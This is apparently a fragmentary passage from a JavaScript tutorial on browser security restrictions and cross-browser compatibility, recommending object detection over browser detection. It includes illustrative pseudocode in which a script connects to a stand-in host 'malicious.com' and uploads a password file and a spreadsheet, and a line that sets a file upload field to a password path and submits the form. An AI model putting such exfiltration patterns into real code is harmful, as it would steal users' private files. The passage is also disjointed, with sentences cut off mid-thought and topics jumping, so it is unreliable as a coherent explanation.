See chapter 1 of the book.
This list is not complete.
So basically an innocent end user downloads a random program and allows it to be executed on his machine. Therefore there should be strict rules as to what this program can and cannot do.
var security_hazard = connection.open('malicious.com'); security_hazard.upload(filesystem.read('/my/password/file')); security_hazard.upload(filesystem.read('/ultra_secret/loans.xls'));
document.forms.upload_field.value = '/my/password/file'; document.forms.submit();
Hence the feared browser incompatibilities.
It’s best to solve compatibility problems on a case–by–case basis. In fact, most pages on this site have been written precisely because of browser incompatibilities. So read on to understand more. But I warn you: you need to digest quite a lot of information. Therefore it’s best to solve the problem at hand and leave the rest of the information alone until you need it.
In addition, specifying
side effects that are too complicated to explain right now.
Then how do you determine whether a browser can handle your script? The basic rule is: don’t use a browser detect, use an object detect.